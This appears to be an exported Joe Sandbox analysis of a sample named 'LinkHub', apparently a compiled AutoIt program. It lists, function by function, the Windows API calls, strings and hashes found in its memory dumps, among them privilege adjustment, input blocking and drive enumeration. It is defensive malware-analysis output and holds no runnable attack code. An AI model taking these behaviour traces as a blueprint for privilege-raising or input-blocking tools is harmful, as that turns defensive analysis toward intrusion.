Opcode ID: 41597dce080817efd78f3cb48bd9e5a5c433ccadacc448d4ea2290569fddae09
Instruction ID: 3e2da335aae075e32c58a09e3bfeff283b35e5e1b9666eda2b0f68d13bd1ca2d
Opcode Fuzzy Hash: 41597dce080817efd78f3cb48bd9e5a5c433ccadacc448d4ea2290569fddae09
Instruction Fuzzy Hash: E6F0677180424EABDB019FA5C906BBEBBB0FF08309F00804AF961EA192C77D8601DF94

Function 00B61A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B61B48), ref: 00B61A20
CloseHandle.KERNEL32(?,?,00B61B48), ref: 00B61A35

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 55c44e84409c52b6cbf300cce2f53dd941b945a433ccae94c0e6887eb14034d5
Instruction ID: 9520ae647552e680c559ff367937b2966f3ab78afb61e2d4b0fbe6799ae9b1e9
Opcode Fuzzy Hash: 55c44e84409c52b6cbf300cce2f53dd941b945a433ccae94c0e6887eb14034d5
Instruction Fuzzy Hash: 9EE04F72018610BFF7252B21FD06F76B7E9EB04311F14885EF4A581471DB726CA0DB54

Function 00B7F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B7F51A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 899f930c1f523208ada4aa8a89ffa0dc08358274c3f2172e19ad22ee14a6377e
Instruction ID: 4e542e76495d663941b4967c82a9de8888f9f036d1122b9574141a4572ca45ef
Opcode Fuzzy Hash: 899f930c1f523208ada4aa8a89ffa0dc08358274c3f2172e19ad22ee14a6377e
Instruction Fuzzy Hash: 58E048312002055FC7109F69E444956FBD8EFA4761F048466F859C7351DA70F9408BA5

Function 00B6EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B6ECC7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 30694bb597045312e1875fe1e949d04fe634fc88d3686bea2fce4d7532c40800
Instruction ID: 3459a67d52607a649512cdb26095a65a7b16e519dcc2f1dc58d614db5eb6f628
Opcode Fuzzy Hash: 30694bb597045312e1875fe1e949d04fe634fc88d3686bea2fce4d7532c40800
Instruction Fuzzy Hash: ECD05EBE1942003DE81D0B388E6FB762589E701741F9806CAB222C56D8E5DDD980AB21

Function 00B20D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B2075E), ref: 00B20D4A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 390b5ac67ff43b3de97c6d3e463d1e68d5b2d959c82c122571835a4bab96b27f
Instruction ID: 6792207ad553d8205edaff63d80fd481eb0ab070d347fd5529c4908a432c4633
Opcode Fuzzy Hash: 390b5ac67ff43b3de97c6d3e463d1e68d5b2d959c82c122571835a4bab96b27f
Instruction Fuzzy Hash:

Function 00B8353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B8358D
DeleteObject.GDI32(00000000), ref: 00B835A0
DestroyWindow.USER32 ref: 00B835AF
GetDesktopWindow.USER32 ref: 00B835CA
GetWindowRect.USER32(00000000), ref: 00B835D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B83700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B8370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B83755
GetClientRect.USER32(00000000,?), ref: 00B83761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B8379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B837BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B837D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B837DD
GlobalLock.KERNEL32(00000000), ref: 00B837E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B837F5
GlobalUnlock.KERNEL32(00000000), ref: 00B837FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B83805
GlobalFree.KERNEL32(00000000), ref: 00B83810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B83822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BA0C04,00000000), ref: 00B83838
GlobalFree.KERNEL32(00000000), ref: 00B83848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B8386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B8388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B838AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B83A9C

Strings

static, xrefs: 00B83797, 00B838EE
AutoIt v3, xrefs: 00B8374F
DISPLAY, xrefs: 00B838FF
, xrefs: 00B83A22

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 82d161da96363380f9ee9a365ad8c571020438c9f835f10ba6e83c8ec918376c
Instruction ID: 205822afa57c9632e079238c7e4b9a061c7e577597ca5cc3e80b6a66197f0ffc
Opcode Fuzzy Hash: 82d161da96363380f9ee9a365ad8c571020438c9f835f10ba6e83c8ec918376c
Instruction Fuzzy Hash: 50028D71900215AFDB14DF65CD89EAEBBF9FF48710F008199F915AB2A0DB74AE01CB60

Function 00B97B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B97B67
GetSysColorBrush.USER32(0000000F), ref: 00B97B98
GetSysColor.USER32(0000000F), ref: 00B97BA4
SetBkColor.GDI32(?,000000FF), ref: 00B97BBE
SelectObject.GDI32(?,?), ref: 00B97BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00B97BF8
GetSysColor.USER32(00000010), ref: 00B97C00
CreateSolidBrush.GDI32(00000000), ref: 00B97C07
FrameRect.USER32(?,?,00000000), ref: 00B97C16
DeleteObject.GDI32(00000000), ref: 00B97C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00B97C68
FillRect.USER32(?,?,?), ref: 00B97C9A
GetWindowLongW.USER32(?,000000F0), ref: 00B97CBC

Part of subcall function 00B97E22: GetSysColor.USER32(00000012), ref: 00B97E5B
Part of subcall function 00B97E22: SetTextColor.GDI32(?,00B97B2D), ref: 00B97E5F
Part of subcall function 00B97E22: GetSysColorBrush.USER32(0000000F), ref: 00B97E75
Part of subcall function 00B97E22: GetSysColor.USER32(0000000F), ref: 00B97E80
Part of subcall function 00B97E22: GetSysColor.USER32(00000011), ref: 00B97E9D
Part of subcall function 00B97E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B97EAB
Part of subcall function 00B97E22: SelectObject.GDI32(?,00000000), ref: 00B97EBC
Part of subcall function 00B97E22: SetBkColor.GDI32(?,?), ref: 00B97EC5
Part of subcall function 00B97E22: SelectObject.GDI32(?,?), ref: 00B97ED2
Part of subcall function 00B97E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00B97EF1
Part of subcall function 00B97E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B97F08
Part of subcall function 00B97E22: GetWindowLongW.USER32(?,000000F0), ref: 00B97F15

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 503e3019be7371d29e14eae79121b6dfa937746a4fd86fc074323d9baf278159
Instruction ID: 85ba446ad4c84dc49f6c904577a5f6f3e7f1e20cd6973d3c3ff4081297fab70e
Opcode Fuzzy Hash: 503e3019be7371d29e14eae79121b6dfa937746a4fd86fc074323d9baf278159
Instruction Fuzzy Hash: 82A18D72018301AFCB109F65DD48A6BBBE9FF48320F104A2AFA62A71E0DB71D944CB51

Function 00B01625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00B016B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B42B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B42B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B42F85

Part of subcall function 00B01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B01488,?,00000000,?,?,?,?,00B0145A,00000000,?), ref: 00B01865

SendMessageW.USER32(?,00001053), ref: 00B42FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B42FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B42FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B42FF9

Strings

0, xrefs: 00B42E11

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 633021d2782e0aa406d5a46ef95f00ad179d86e4c4c28851222371570f90faa7
Instruction ID: 49ffd4592ba47cd6f478dff5b34d32dab9f57c758a8a90adb296b4952ce08534
Opcode Fuzzy Hash: 633021d2782e0aa406d5a46ef95f00ad179d86e4c4c28851222371570f90faa7
Instruction Fuzzy Hash: 7212C330601241DFC729CF58C9A4B69BBF5FF44300F9885AAF4459B261CB32ED86EB91

Function 00B8316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B8319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B832C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B83306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B83316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B8335D
GetClientRect.USER32(00000000,?), ref: 00B83369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B833B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B833C1
GetStockObject.GDI32(00000011), ref: 00B833D1
SelectObject.GDI32(00000000,00000000), ref: 00B833D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B833E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B833EE
DeleteDC.GDI32(00000000), ref: 00B833F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B83423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B8343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B8347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B8348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B8349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B834D4
GetStockObject.GDI32(00000011), ref: 00B834DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B834EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B834F4

Strings

msctls_progress32, xrefs: 00B83470
static, xrefs: 00B833AC, 00B834CE
AutoIt v3, xrefs: 00B83355
DISPLAY, xrefs: 00B833B7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 187c5e180a3fe0535fcaea9b46646dcca06bdbb0d45976b11235510c0f7e2ddf
Instruction ID: def17e1bd78bf1117242f3a8140fdaec432d75821b6f96c853ca3ac22bba61f7
Opcode Fuzzy Hash: 187c5e180a3fe0535fcaea9b46646dcca06bdbb0d45976b11235510c0f7e2ddf
Instruction Fuzzy Hash: 18B13C71A00215AFEB14DFA9CD49FAEBBF9EB08710F004155FA15A72E0DB74AD40CBA4

Function 00B75524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B75532
GetDriveTypeW.KERNEL32(?,00B9DC30,?,\\.\,00B9DCD0), ref: 00B7560F
SetErrorMode.KERNEL32(00000000,00B9DC30,?,\\.\,00B9DCD0), ref: 00B7577B

Strings

Unknown, xrefs: 00B75632, 00B756C8
SCSI, xrefs: 00B756CF
1394, xrefs: 00B756E4
CDROM, xrefs: 00B75640
SSA, xrefs: 00B756EB
\\.\, xrefs: 00B75584
Virtual, xrefs: 00B7572A
RAID, xrefs: 00B75700
FileBackedVirtual, xrefs: 00B75731
SSD, xrefs: 00B7568F
Removable, xrefs: 00B75655, 00B7565A
Network, xrefs: 00B75647
iSCSI, xrefs: 00B75707
ATA, xrefs: 00B756DD
RAMDisk, xrefs: 00B75639
Fixed, xrefs: 00B7564E
ATAPI, xrefs: 00B756D6
PhysicalDrive, xrefs: 00B755BB
MMC, xrefs: 00B75723
SAS, xrefs: 00B7570E
SATA, xrefs: 00B75715
USB, xrefs: 00B756F9
Fibre, xrefs: 00B756F2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 77e2b6818420a978f032ec760652cffdfa9b1f2c42f437da4133a56a992c06a3
Instruction ID: 8bbdc0ba7f7c4f628a552a8829109756dd00db447e1705eb31329452ba79fd0a
Opcode Fuzzy Hash: 77e2b6818420a978f032ec760652cffdfa9b1f2c42f437da4133a56a992c06a3
Instruction Fuzzy Hash: BE61B070A84A45DBC738DF24C991E7977E1EF14350B24C0E9E42FAB2A1CAB1ED41CB51

Function 00B91A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B91BC4
GetDesktopWindow.USER32 ref: 00B91BD9
GetWindowRect.USER32(00000000), ref: 00B91BE0
GetWindowLongW.USER32(?,000000F0), ref: 00B91C35
DestroyWindow.USER32(?), ref: 00B91C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B91C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B91CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B91CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00B91CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B91CE1
IsWindowVisible.USER32(00000000), ref: 00B91D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B91D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B91D6C
GetWindowRect.USER32(00000000,?), ref: 00B91D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00B91DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00B91DC4
CopyRect.USER32(?,?), ref: 00B91DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00B91E46

Strings

0, xrefs: 00B91B6F
(, xrefs: 00B91DB7
tooltips_class32, xrefs: 00B91C82

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e6715801768d8e9fb78629ff7696d104001ff8e46190d695d4df32766ace1ab3
Instruction ID: 957fcc11a8491cdeacb89bfd7623417be353b9fd1a9d288de7f11d01df979ce0
Opcode Fuzzy Hash: e6715801768d8e9fb78629ff7696d104001ff8e46190d695d4df32766ace1ab3
Instruction Fuzzy Hash: 59B18D71604301AFDB14DF69C984B6ABBE5FF84350F008D6DF5999B2A1CB31E844DB92

Function 00B90CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B90D81
_wcslen.LIBCMT ref: 00B90DBB
_wcslen.LIBCMT ref: 00B90E25
_wcslen.LIBCMT ref: 00B90E8D
_wcslen.LIBCMT ref: 00B90F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B90F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B90FA0

Part of subcall function 00B1FD52: _wcslen.LIBCMT ref: 00B1FD5D

Part of subcall function 00B62B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B62BA5
Part of subcall function 00B62B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B62BD7

Strings

ISSELECTED, xrefs: 00B90F79
GETSELECTED, xrefs: 00B9107D
GETTEXT, xrefs: 00B90E88, 00B90EA3
FINDITEM, xrefs: 00B910C3
GETITEMCOUNT, xrefs: 00B90DB2, 00B90DD3
SELECTCLEAR, xrefs: 00B90FC9
SELECTINVERT, xrefs: 00B9101A
GETSELECTEDCOUNT, xrefs: 00B90F0C, 00B90F27
DESELECT, xrefs: 00B91038
SELECT, xrefs: 00B90FE4
SELECTALL, xrefs: 00B90FB1
GETSUBITEMCOUNT, xrefs: 00B90E20, 00B90E3B
VIEWCHANGE, xrefs: 00B91111

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 685763a45c829e73dbf4c8990280f28a5f7e44bae8c2332f2b43c9c3efadc55a
Instruction ID: 2da41185c84adfefe121c86c8218d918b9937255720eab2dcec95c786987b337
Opcode Fuzzy Hash: 685763a45c829e73dbf4c8990280f28a5f7e44bae8c2332f2b43c9c3efadc55a
Instruction Fuzzy Hash: BAE1BE312182428FCB14EF28C99197AB7E2FF85354B1449FCF8969B2A1DB31ED45CB51

Function 00B02521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B025F8
GetSystemMetrics.USER32(00000007), ref: 00B02600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B0262B
GetSystemMetrics.USER32(00000008), ref: 00B02633
GetSystemMetrics.USER32(00000004), ref: 00B02658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B02675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B02685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B026B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B026CC
GetClientRect.USER32(00000000,000000FF), ref: 00B026EA
GetStockObject.GDI32(00000011), ref: 00B02706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B02711

Part of subcall function 00B019CD: GetCursorPos.USER32(?), ref: 00B019E1
Part of subcall function 00B019CD: ScreenToClient.USER32(00000000,?), ref: 00B019FE
Part of subcall function 00B019CD: GetAsyncKeyState.USER32(00000001), ref: 00B01A23
Part of subcall function 00B019CD: GetAsyncKeyState.USER32(00000002), ref: 00B01A3D

SetTimer.USER32(00000000,00000000,00000028,00B0199C), ref: 00B02738

Strings

AutoIt v3 GUI, xrefs: 00B026B0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

